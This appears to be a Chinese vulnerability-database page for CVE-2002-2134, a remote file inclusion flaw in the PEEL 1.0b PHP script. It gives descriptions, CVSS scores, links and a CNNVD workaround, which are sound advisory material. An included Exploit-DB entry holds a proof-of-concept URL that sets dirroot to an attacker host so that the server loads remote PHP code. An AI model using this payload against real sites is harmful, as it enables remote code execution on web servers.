CVE-2002-2134
CVSS5.0
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:32:25
NMCOE    

[原文]haut.php in PEEL 1.0b allows remote attackers to execute arbitrary PHP code by modifying the dirroot parameter to reference a URL on a remote web server that contains the code in a lang.php file.


[CNNVD]PEEL远程文件包含漏洞(CNNVD-200212-258)

        
        PEEL是一款PHP编写的目录管理工具。
        haut.php脚本对用户提交的参数缺少正确检查,远程攻击者可以利用这个漏洞指定远程服务器上任意文件为包含文件,以WEB权限执行包含文件中的代码。
        modeles/haut.php没有正确处理$dirroot参数的内容,远程攻击者可以在自己控制的服务器上构建任意PHP文件,提交包含远程服务器文件的参数数据的请求,可导致包含文件的代码以WEB权限在系统上执行。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2134
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-2134
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-258
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/archive/1/304779
(PATCH)  BUGTRAQ  20021231 PEEL (PHP)
http://www.securityfocus.com/bid/6496
(UNKNOWN)  BID  6496
http://www.iss.net/security_center/static/10960.php
(UNKNOWN)  XF  peel-haut-file-include(10960)
http://www.securitytracker.com/id?1005869
(UNKNOWN)  SECTRACK  1005869
http://secunia.com/advisories/7797
(UNKNOWN)  SECUNIA  7797

- 漏洞信息

PEEL远程文件包含漏洞
中危 输入验证
2002-12-31 00:00:00 2006-01-25 00:00:00
远程  
        
        PEEL是一款PHP编写的目录管理工具。
        haut.php脚本对用户提交的参数缺少正确检查,远程攻击者可以利用这个漏洞指定远程服务器上任意文件为包含文件,以WEB权限执行包含文件中的代码。
        modeles/haut.php没有正确处理$dirroot参数的内容,远程攻击者可以在自己控制的服务器上构建任意PHP文件,提交包含远程服务器文件的参数数据的请求,可导致包含文件的代码以WEB权限在系统上执行。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 使用如下代码:
                $langfile = $dirroot."/lang/".$SESSION["lang"]."/lang.php";
        if (file_exists($langfile)){
        require ($langfile);
        }
        ?>
        更替'modeles/haut.php'中的如下脚本:
                $langfile = $dirroot."/lang/".$SESSION["lang"]."/lang.php";
        require ($langfile);
        ?>
        厂商补丁:
        PEEL
        ----
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.mapetite-entreprise.com/

- 漏洞信息 (22114)

PEEL 1.0 b Remote File Include Vulnerability (EDBID:22114)
php webapps
2002-12-31 Verified
0 frog
N/A [点击下载]
source: http://www.securityfocus.com/bid/6496/info

PEEL is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers.

An attacker may exploit this by supplying a path to a maliciously created file, located on an attacker-controlled host as a value for some parameters.

If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. Successful exploitation may provide local access to the attacker. 

http://[target]/modeles/haut.php?dirroot=http://[attacker]&SESSION=.
with :
http://[attacker]/lang/lang.php 		

- 漏洞信息

60056
PEEL haut.php dirroot Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown

- 漏洞描述

PEEL contains a flaw that may allow a remote attacker to execute arbitrary commands or code. The issue is due to the 'haut.php' script not properly sanitizing user input supplied to the 'dirroot' parameter. This may allow an attacker to include a file from a third-party remote host that contains commands or code that will be executed by the vulnerable script with the same privileges as the web server.

- 时间线

2002-12-31 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站